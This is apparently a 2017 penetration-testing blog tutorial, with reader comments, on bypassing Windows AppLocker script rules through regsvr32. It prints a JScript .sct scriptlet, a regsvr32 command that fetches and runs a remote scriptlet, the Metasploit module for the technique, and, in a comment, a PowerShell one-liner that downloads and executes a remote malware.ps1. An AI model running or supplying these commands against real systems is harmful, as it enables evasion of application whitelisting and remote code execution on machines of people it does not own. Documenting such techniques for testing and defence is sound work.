AppLocker Bypass - Regsvr32

The document discusses how AppLocker bypass techniques can be used to execute arbitrary code on systems with AppLocker restrictions in place. It describes how the Windows regsvr32 command-line utility can register DLLs and ActiveX controls, and how this feature can be abused to bypass AppLocker and execute scripts or payloads from a remote web server. Specifically, it shows how a .sct scriptlet can be used with regsvr32 to start the Windows command prompt and run a custom binary dropped on the target system.


Penetration Testing Lab – Articles from the Pentesting Field

AppLocker Bypass – Regsvr32
May 11, 2017 | netbiosX | Defense Evasion | Tags: AppLocker, Bypass, Metasploit, Regsvr32, Script Rules | 5 Comments

AppLocker was designed to allow administrators to block the execution of Windows installer files, executables and scripts by users. However, various techniques have been discovered that can bypass these restrictions. For example, in Windows environments that are configured to prevent the execution of scripts via AppLocker, the regsvr32 command line utility can be used as a bypass method.

AppLocker – Script Rules


Regsvr32 is a Windows command line utility that is used to register and unregister .dll files and ActiveX controls in the registry. Casey Smith discovered that it is possible to bypass AppLocker script rules by calling the regsvr32 utility to execute a command or arbitrary code through .sct files. This utility has many benefits from an attacker's point of view: it is a trusted Microsoft binary, it is proxy aware, it supports TLS encryption, it follows redirects and it doesn't leave any trace on the disk.

The scriptlet below is a modified version of the code that Casey Smith wrote, but instead of calling calc.exe or cmd.exe it will execute a custom binary that has already been dropped on the target system, if the command prompt is allowed:

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="Pentest"
        classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">

    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\
    ]]>

    </script>
    </registration>
    </scriptlet>

The regsvr32 utility can be used to request and execute the scriptlet from the web server on which it is hosted:

    regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

Regsvr32 – Request and Execution of the Scriptlet
These options instruct regsvr32 to run:

/s – silently, without displaying any messages
/n – without calling DllRegisterServer
/i – with the string after the colon (here the address of the scriptlet) passed to DllInstall, since DllRegisterServer is not called
/u – using the unregister method

It is also possible to use regsvr32 to run a locally stored payload:

    regsvr32 /u /n /s /i:payload.sct scrobj.dll

The command will execute the scriptlet directly from the web server that is hosting the file. The JavaScript code that is embedded in the .sct file instructs the pentestlab3.exe binary to be executed from the command prompt.

AppLocker Bypass via Regsvr32

Since pentestlab3 is a Metasploit payload, a Meterpreter session will be opened:

Regsvr32 – Meterpreter

Of course, direct execution of scripts is still blocked; via the regsvr32 utility, however, execution is possible as shown in the example above.

AppLocker – Restriction of Script Execution
Metasploit Framework has a specific module which can be used to bypass AppLocker via the regsvr32 utility automatically:


    exploit/windows/misc/regsvr32_applocker_bypass_server

The module will start a web server which will host a malicious .sct file. It will also print the command that needs to be executed on the target system.
Metasploit – Regsvr32 Module
From the moment the command is executed, regsvr32 will request the .sct file from the web server and will execute a PowerShell payload.
Metasploit – Execution of the Payload

As a result, a Meterpreter session will be opened, bypassing the AppLocker restrictions.


Resources

https://www.rapid7.com/db/modules/exploit/windows/misc/regsvr32_applocker_bypass_serv

http://subt0x10.blogspot.co.uk/2017/04/bypass-application-whitelisting-script.html


5 Comments

atropineal
May 18, 2017 @ 21:12:55

to my understanding this bypasses restrictions on the execution of JavaScript, not on the execution of a binary. if you configure applocker with the default rules you will not be able to execute pentestlab.exe, with or without regsvr32

netbiosX
May 19, 2017 @ 08:16:44

It indeed bypasses script rule restrictions. However, don't forget that this method can allow you to run an executable that is hosted at a URL that you control, so there is no need for the binary to be dropped on the disk. Another scenario would be for the payload.sct file to actually call PowerShell and run scripts from memory:

    powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://[website]/malware.ps1'))

There are plenty of possibilities.

atropineal
May 19, 2017 @ 09:26:40

hey! thanks for the response. if we can execute powershell anyway (and regsvr32 will not help us to run it if it is blocked), then we can already run the powershell web delivery command you mention directly.

regsvr32 does seem great in that we can download and execute a remote vbscript that can inject and execute arbitrary shellcode into its own process, and this seems great even if there is no requirement to bypass whitelisting!

i haven't seen a way to download and execute an actual exe file without it touching disk though, which you seem to be referring to. if you know of such a mechanism i'd be very pleased to hear about it!

playing with the regsrv32 applocker bypass – atropineal
May 19, 2017 @ 22:32:54

Command and Control – JavaScript | Penetration Testing Lab
Jan 08, 2018 @ 04:39:47